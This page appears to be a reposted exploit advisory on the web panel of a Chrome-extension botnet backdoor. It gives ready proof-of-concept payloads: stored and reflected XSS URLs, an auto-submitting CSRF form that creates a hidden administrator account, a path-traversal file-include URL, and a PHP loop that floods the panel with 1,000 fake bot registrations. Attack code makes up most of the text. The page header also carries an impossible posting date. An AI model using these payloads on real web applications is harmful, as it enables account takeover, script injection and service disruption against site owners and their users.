Home / os / solaris

Botnet graniet chrome backdoor v3.0 web panel multi vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>botnet graniet chrome backdoor v3.0 web panel multi vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: botnet graniet chrome backdoor v3.0 web panel multi vulnerability # Date: 10-1-2017 # Exploit Author: alqnas eslam # Vendor Homepage:fb.com/alqnas4 # Software Link:https://github.com/graniet/chromebackdoor # Tested on:any os 1- cross site scripting There are many xss vulnerability at graniet chrome backdoor some of them stored xss: POC: http://localhost/backdoor/web/gate.php?add=<h1>test</h1>&version=<script>alert(/xss/);</script> this POC add Bots with xss payload so when admin open admin panel the xss code will execute image of POC: https://s30.postimg.org/hdngwgxlt/Screenshot_from_2017_01_10_18_27_10.png image of source code https://s27.postimg.org/lwk1jwijn/Screenshot_from_2017_01_10_18_44_22.png reflected xss: POC: http://localhost/backdoor/web/index.php?action=info&id=1'></a><script>alert(/xxs/);</script> image of source code https://s27.postimg.org/3v0wm3oir/Screenshot_from_2017_01_10_18_45_54.png 2- csrf add user administrator <body onload="document.alqnas.submit()"> <form action="http://localhost/backdoor/web/index.php?action=settings#" method="post" name="alqnas"> <input type="hidden" name="username" value="admin-hacker" /> <input type="hidden" name="password" value="hacker-pass" /> <input type="hidden" name="role" value="0" /> <input type="hidden" name="add_user" value="Add user" /> </form> </body> image of request https://s27.postimg.org/5j020r2eb/Screenshot_from_2017_01_10_18_43_49.png 3- local file include http://localhost/backdoor/web/index.php?action=../../relais image of source code https://s27.postimg.org/4yl0y295v/Screenshot_from_2017_01_10_18_50_49.png 4- ddos add bots <?php function addbots($url) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); $output=curl_exec($ch); curl_close($ch); } //1000 are numbers you will send it $i =1; while ( $i <=1000){ $d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); $a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); $rand = substr( $d , 0 , 5 ); $shuf = substr( $a , 0 , 5 ); //change localhost to url of bot addbots("http://localhost/backdoor/web/gate.php?add=$rand&version=$shuf"); $i++; } ?> </BODY></HTML>

 

TOP